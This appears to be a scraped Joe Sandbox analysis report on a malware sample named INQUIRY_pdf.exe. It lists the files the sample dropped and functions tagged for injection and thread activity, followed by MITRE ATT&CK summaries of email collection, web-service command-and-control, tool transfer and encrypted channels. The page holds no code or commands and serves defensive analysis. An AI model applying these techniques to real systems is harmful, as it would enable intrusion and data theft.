URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\INQUIRY_pdf.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1m1rhqga.ske.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ilx4ls3.5y5.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4vz3krbz.cl0.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rd1y0dwn.xzf.ps1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Windows Analysis Report
INQUIRY_pdf.exe

Function 0110E398 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128
threadCOMMON

Function 078ACAEC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 246
processCOMMON

Function 078ACAF8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243
processCOMMON

Function 011058EC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 98
COMMON

Function 011044D4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96
COMMON

Function 078AC868 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72
injectionCOMMON

Function 078AC870 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69
injectionCOMMON

Function 078AC6D2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
threadCOMMON

Function 078AC959 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Function 078AC6D8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
threadCOMMON

Function 078AC960 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
COMMON

Function 0110E5E0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62
COMMON

Function 078AC7AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56
memoryCOMMON

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre